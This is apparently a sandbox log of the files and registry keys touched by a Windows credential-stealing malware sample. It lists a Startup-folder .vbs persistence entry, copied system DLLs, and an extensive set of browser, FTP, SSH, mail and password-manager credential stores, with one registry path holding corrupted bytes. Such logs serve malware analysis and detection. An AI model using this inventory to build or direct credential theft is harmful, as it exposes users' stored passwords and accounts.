C:\Users\user\AppData\Local\Temp\D1B132.exe
C:\Users\user\AppData\Roaming\sticik\stickiy.exe:ZoneIdentifier
C:\Users\user\AppData\Roaming\sticik\stickiy.ENG
C:\Users\user\AppData\Roaming\sticik\stickiy.ENG.DLL
C:\Users\user\AppData\Roaming\sticik\stickiy.EN
C:\Users\user\AppData\Roaming\sticik\stickiy.EN.DLL
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
C:\Program Files\NETGATE\Black Hawk
C:\Program Files (x86)\Lunascape\Lunascape6\plugins\{9BDD5314-20A6-4d98-AB30-8325A95771EE}
C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Web Data
C:\Users\user\AppData\LocalComodo\Dragon\Login Data
C:\Users\user\AppData\LocalComodo\Dragon\Default\Login Data
C:\Users\user\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data
C:\Users\user\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data
C:\Users\user\AppData\LocalMapleStudio\ChromePlus\Login Data
C:\Users\user\AppData\LocalMapleStudio\ChromePlus\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
C:\Users\user\AppData\LocalGoogle\Chrome\Login Data
C:\Users\user\AppData\LocalGoogle\Chrome\Default\Login Data
C:\Users\user\AppData\Local\Nichrome\User Data\Default\Login Data
C:\Users\user\AppData\Local\Nichrome\User Data\Default\Web Data
C:\Users\user\AppData\LocalNichrome\Login Data
C:\Users\user\AppData\LocalNichrome\Default\Login Data
C:\Users\user\AppData\Local\RockMelt\User Data\Default\Login Data
C:\Users\user\AppData\Local\RockMelt\User Data\Default\Web Data
C:\Users\user\AppData\LocalRockMelt\Login Data
C:\Users\user\AppData\LocalRockMelt\Default\Login Data
C:\Users\user\AppData\Local\Spark\User Data\Default\Login Data
C:\Users\user\AppData\Local\Spark\User Data\Default\Web Data
C:\Users\user\AppData\LocalSpark\Login Data
C:\Users\user\AppData\LocalSpark\Default\Login Data
C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
C:\Users\user\AppData\Local\Chromium\User Data\Default\Web Data
C:\Users\user\AppData\LocalChromium\Login Data
C:\Users\user\AppData\LocalChromium\Default\Login Data
C:\Users\user\AppData\Local\Titan Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Titan Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalTitan Browser\Login Data
C:\Users\user\AppData\LocalTitan Browser\Default\Login Data
C:\Users\user\AppData\Local\Torch\User Data\Default\Login Data
C:\Users\user\AppData\Local\Torch\User Data\Default\Web Data
C:\Users\user\AppData\LocalTorch\Login Data
C:\Users\user\AppData\LocalTorch\Default\Login Data
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data
C:\Users\user\AppData\LocalYandex\YandexBrowser\Login Data
C:\Users\user\AppData\LocalYandex\YandexBrowser\Default\Login Data
C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Epic Privacy Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalEpic Privacy Browser\Login Data
C:\Users\user\AppData\LocalEpic Privacy Browser\Default\Login Data
C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalCocCoc\Browser\Login Data
C:\Users\user\AppData\LocalCocCoc\Browser\Default\Login Data
C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Web Data
C:\Users\user\AppData\LocalVivaldi\Login Data
C:\Users\user\AppData\LocalVivaldi\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Chromodo\User Data\Default\Login Data
C:\Users\user\AppData\Local\Comodo\Chromodo\User Data\Default\Web Data
C:\Users\user\AppData\LocalComodo\Chromodo\Login Data
C:\Users\user\AppData\LocalComodo\Chromodo\Default\Login Data
C:\Users\user\AppData\Local\Superbird\User Data\Default\Login Data
C:\Users\user\AppData\Local\Superbird\User Data\Default\Web Data
C:\Users\user\AppData\LocalSuperbird\Login Data
C:\Users\user\AppData\LocalSuperbird\Default\Login Data
C:\Users\user\AppData\Local\Coowon\Coowon\User Data\Default\Login Data
C:\Users\user\AppData\Local\Coowon\Coowon\User Data\Default\Web Data
C:\Users\user\AppData\LocalCoowon\Coowon\Login Data
C:\Users\user\AppData\LocalCoowon\Coowon\Default\Login Data
C:\Users\user\AppData\Local\Mustang Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\Mustang Browser\User Data\Default\Web Data
C:\Users\user\AppData\LocalMustang Browser\Login Data
C:\Users\user\AppData\LocalMustang Browser\Default\Login Data
C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Login Data
C:\Users\user\AppData\Local\360Browser\Browser\User Data\Default\Web Data
C:\Users\user\AppData\Local360Browser\Browser\Login Data
C:\Users\user\AppData\Local360Browser\Browser\Default\Login Data
C:\Users\user\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Login Data
C:\Users\user\AppData\Local\CatalinaGroup\Citrio\User Data\Default\Web Data
C:\Users\user\AppData\LocalCatalinaGroup\Citrio\Login Data
C:\Users\user\AppData\LocalCatalinaGroup\Citrio\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Login Data
C:\Users\user\AppData\Local\Google\Chrome SxS\User Data\Default\Web Data
C:\Users\user\AppData\LocalGoogle\Chrome SxS\Login Data
C:\Users\user\AppData\LocalGoogle\Chrome SxS\Default\Login Data
C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
C:\Users\user\AppData\Local\Orbitum\User Data\Default\Web Data
C:\Users\user\AppData\LocalOrbitum\Login Data
C:\Users\user\AppData\LocalOrbitum\Default\Login Data
C:\Users\user\AppData\Local\Iridium\User Data\Default\Login Data
C:\Users\user\AppData\Local\Iridium\User Data\Default\Web Data
C:\Users\user\AppData\LocalIridium\Login Data
C:\Users\user\AppData\LocalIridium\Default\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\Login Data
C:\Users\user\AppData\Roaming\Opera\Opera Next\data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\User Data\Default\Web Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Login Data
C:\Users\user\AppData\Roaming\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer\Default\Login Data
C:\Users\user\AppData\Local\QupZilla\profiles\default\browsedata.db
C:\Users\user\AppData\Roaming\Opera
C:\Users\user\AppData\Roaming\.purple\accounts.xml
C:\Users\user\Documents\SuperPutty
C:\Program Files (x86)\FTPShell\ftpshell.fsi
C:\Users\user\AppData\Roaming\Notepad++\plugins\config\NppFTP\NppFTP.xml
C:\Program Files (x86)\oZone3D\MyFTP\myftp.ini
C:\Users\user\AppData\Roaming\FTPBox\profiles.conf
C:\Program Files (x86)\Sherrod Computers\sherrod FTP\favorites
C:\Program Files (x86)\FTP Now\sites.xml
C:\Program Files (x86)\NexusFile\userdata\ftpsite.ini
C:\Users\user\AppData\Roaming\NexusFile\ftpsite.ini
C:\Users\user\Documents\NetSarang\Xftp\Sessions
C:\Users\user\AppData\Roaming\NetSarang\Xftp\Sessions
C:\Program Files (x86)\EasyFTP\data
C:\Users\user\AppData\Roaming\SftpNetDrive
C:\Program Files (x86)\AbleFTP7\encPwd.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\encPwd.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\encPwd.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\encPwd.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\encPwd.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\encPwd.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\encPwd.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\encPwd.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\AbleFTP14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\encPwd.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\encPwd.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\encPwd.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\encPwd.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\encPwd.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\encPwd.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\encPwd.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\encPwd.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\JaSFtp14\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize7\encPwd.jsd
C:\Program Files (x86)\Automize7\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize7\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize8\encPwd.jsd
C:\Program Files (x86)\Automize8\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize8\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize9\encPwd.jsd
C:\Program Files (x86)\Automize9\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize9\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize10\encPwd.jsd
C:\Program Files (x86)\Automize10\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize10\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize11\encPwd.jsd
C:\Program Files (x86)\Automize11\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize11\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize12\encPwd.jsd
C:\Program Files (x86)\Automize12\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize12\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize13\encPwd.jsd
C:\Program Files (x86)\Automize13\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize13\data\settings\ftpProfiles-j.jsd
C:\Program Files (x86)\Automize14\encPwd.jsd
C:\Program Files (x86)\Automize14\data\settings\sshProfiles-j.jsd
C:\Program Files (x86)\Automize14\data\settings\ftpProfiles-j.jsd
C:\Users\user\AppData\Roaming\Cyberduck
C:\Users\user\AppData\Roaming\iterate_GmbH
C:\Users\user\.config\fullsync\profiles.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.xml
C:\Users\user\AppData\Roaming\FTPInfo\ServerList.cfg
C:\Program Files (x86)\FileZilla\Filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\filezilla.xml
C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml
C:\Program Files (x86)\Staff-FTP\sites.ini
C:\Users\user\AppData\Roaming\BlazeFtp\site.dat
C:\Program Files (x86)\Fastream NETFile\My FTP Links
C:\Program Files (x86)\GoFTP\settings\Connections.txt
C:\Users\user\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat
C:\Program Files (x86)\DeluxeFTP\sites.xml
C:\Windows\wcx_ftp.ini
C:\Users\user\AppData\Roaming\wcx_ftp.ini
C:\Users\user\wcx_ftp.ini
C:\Users\user\AppData\Roaming\GHISLER\wcx_ftp.ini
C:\Program Files (x86)\FTPGetter\Profile\servers.xml
C:\Users\user\AppData\Roaming\FTPGetter\servers.xml
C:\Program Files (x86)\WS_FTP\WS_FTP.INI
C:\Windows\WS_FTP.INI
C:\Users\user\AppData\Roaming\Ipswitch
C:\Users\user\site.xml
C:\Users\user\AppData\Local\PokerStars*
C:\Users\user\AppData\Local\ExpanDrive
C:\Users\user\AppData\Roaming\Steed\bookmarks.txt
C:\Users\user\AppData\Roaming\FlashFXP
C:\ProgramData\FlashFXP
C:\Users\user\AppData\Local\INSoftware\NovaFTP\NovaFTP.db
C:\Users\user\AppData\Roaming\NetDrive\NDSites.ini
C:\Users\user\AppData\Roaming\NetDrive2\drives.dat
C:\ProgramData\NetDrive2\drives.dat
C:\Users\user\AppData\Roaming\SmartFTP
C:\Users\user\AppData\Roaming\Far Manager\Profile\PluginsData\42E4AEB1-A230-44F4-B33C-F195BB654931.db
C:\Users\user\Documents\*.tlp
C:\Users\user\Documents\*.bscp
C:\Users\user\Documents\*.vnc
C:\Users\user\Desktop\*.vnc
C:\Users\user\Documents\mSecure
C:\ProgramData\Syncovery
C:\Program Files (x86)\FreshWebmaster\FreshFTP\FtpSites.SMF
C:\Users\user\AppData\Roaming\BitKinex\bitkinex.ds
C:\Users\user\AppData\Roaming\UltraFXP\sites.xml
C:\Users\user\AppData\Roaming\FTP Now\sites.xml
C:\Program Files (x86)\Odin Secure FTP Expert\QFDefault.QFQ
C:\Program Files (x86)\Odin Secure FTP Expert\SiteInfo.QFP
C:\Program Files (x86)\Foxmail\mail
C:\Foxmail*
C:\Users\user\AppData\Roaming\Pocomail\accounts.ini
C:\Users\user\Documents\Pocomail\accounts.ini
C:\Users\user\AppData\Roaming\GmailNotifierPro\ConfigData.xml
C:\Users\user\AppData\Roaming\DeskSoft\CheckMail
C:\Program Files (x86)\WinFtp Client\Favorites.dat
C:\Windows\32BitFtp.TMP
C:\Windows\32BitFtp.ini
C:\FTP Navigator\Ftplist.txt
C:\Softwarenetz\Mailing\Daten\mailing.vdt
C:\Users\user\AppData\Roaming\Opera Mail\Opera Mail\wand.dat
C:\Users\user\Documents\*Mailbox.ini
C:\Users\user\Documents\yMail2\POP3.xml
C:\Users\user\Documents\yMail2\SMTP.xml
C:\Users\user\Documents\yMail2\Accounts.xml
C:\Users\user\Documents\yMail\ymail.ini
C:\Users\user\AppData\Roaming\TrulyMail\Data\Settings\user.config
C:\Users\user\Documents\*.spn
C:\Users\user\Desktop\*.spn
C:\Users\user\AppData\Roaming\To-Do DeskList\tasks.db
C:\Users\user\AppData\Roaming\stickies\images
C:\Users\user\AppData\Roaming\stickies\rtf
C:\Users\user\AppData\Roaming\NoteFly\notes
C:\Users\user\AppData\Roaming\Conceptworld\Notezilla\Notes8.db
C:\Users\user\AppData\Roaming\Microsoft\Sticky Notes\StickyNotes.snt
C:\Users\user\Documents
C:\Users\user\Documents\*.kdbx
C:\Users\user\Desktop
C:\Users\user\Desktop\*.kdbx
C:\Users\user\Documents\*.kdb
C:\Users\user\Desktop\*.kdb
C:\Users\user\Documents\Enpass
C:\Users\user\Documents\My RoboForm Data
C:\Users\user\Documents\1Password
C:\Users\user\AppData\Local\Temp\Mikrotik\Winbox
C:\Users\user\AppData\Roaming\sticik\NETAPI32.DLL
C:\Windows\System32\netapi32.dll
C:\Users\user\AppData\Roaming\sticik\netutils.dll
C:\Windows\System32\netutils.dll
C:\Users\user\AppData\Roaming\sticik\srvcli.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\Microsoft\Credentials
C:\Users\user\AppData\Roaming\Microsoft\Credentials\*
C:\Users\user\AppData\Local\Microsoft\Credentials
C:\Users\user\AppData\Local\Microsoft\Credentials\*
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Windows\Temp
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Users\user\AppData\Local\Temp\D1B132.exe
C:\Windows\System32\netapi32.dll
C:\Windows\System32\netutils.dll
C:\Windows\System32\srvcli.dll
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50
C:\Users\user\AppData\Roaming\sticik\stickiy.exe
C:\Users\user\AppData\Roaming\sticik\stickiy.exe:ZoneIdentifier
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
C:\Users\user\AppData\Roaming\24CFE6\6F2024.exe
C:\Users\user\AppData\Roaming\sticik\stickiy.exe
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sticik.vbs
C:\Users\user\AppData\Roaming\24CFE6\6F2024.lck
HKEY_CURRENT_USER\Software\Borland\Locales
HKEY_LOCAL_MACHINE\Software\Borland\Locales
HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\en-GB
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\en-GB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
\xea\xa7\x80\xc9\x90EY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox
HKEY_LOCAL_MACHINE\SOFTWARE\ComodoGroup\IceDragon\Setup
HKEY_LOCAL_MACHINE\SOFTWARE\Apple Computer, Inc.\Safari
HKEY_LOCAL_MACHINE\SOFTWARE\K-Meleon
HKEY_LOCAL_MACHINE\SOFTWARE\mozilla.org\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Flock
HKEY_CURRENT_USER\Software\QtWeb.NET\QtWeb Internet Browser\AutoComplete
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox86
HKEY_LOCAL_MACHINE\SOFTWARE\8pecxstudios\Cyberfox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Pale Moon
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Waterfox
HKEY_CURRENT_USER\Software\LinasFTP\Site Manager
HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
HKEY_CURRENT_USER\Software\Ghisler\Total Commander
HKEY_CURRENT_USER\Software
HKEY_CURRENT_USER\Software\Adobe
HKEY_CURRENT_USER\Software\AppDataLow
HKEY_CURRENT_USER\Software\JavaSoft
HKEY_CURRENT_USER\Software\Microsoft
HKEY_CURRENT_USER\Software\Netscape
HKEY_CURRENT_USER\Software\ODBC
HKEY_CURRENT_USER\Software\Policies
HKEY_CURRENT_USER\Software\Sysinternals
HKEY_CURRENT_USER\Software\Wow6432Node
HKEY_CURRENT_USER\Software\Classes
HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
HKEY_CURRENT_USER\Software\Bitvise\BvSshClient
HKEY_CURRENT_USER\Software\VanDyke\SecureFX
HKEY_LOCAL_MACHINE\Software\NCH Software\Fling\Accounts
HKEY_CURRENT_USER\Software\NCH Software\Fling\Accounts
HKEY_LOCAL_MACHINE\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions
HKEY_LOCAL_MACHINE\Software\9bis.com\KiTTY\Sessions
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird
HKEY_CURRENT_USER\Software\IncrediMail\Identities
HKEY_LOCAL_MACHINE\Software\IncrediMail\Identities
HKEY_CURRENT_USER\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\Software\Martin Prikryl
HKEY_LOCAL_MACHINE\SOFTWARE\Postbox\Postbox
HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\FossaMail
HKEY_CURRENT_USER\Software\WinChips\UserAccounts
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0983914516512248bf1031360569f651\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3517490d76624c419a828607e2a54604\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\390687b675150348af0b3ed5b57f371b\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\85e0ee07445e6649ba5bc44e8c7f096a\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\89add512dfedc442ad3626bfcae3c4a1\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b7dcff830d0db247ab3e99f6d18d3db2\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\c02ebc5353d9cd11975200aa004ae40e\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e64b0e0e47cac246ae1cad77acfe3425\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\e67eb059ba9d6642890e6a6aa53ab9fb\Email
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f0bb1e5f09f80a488274ca81ffbccd9c
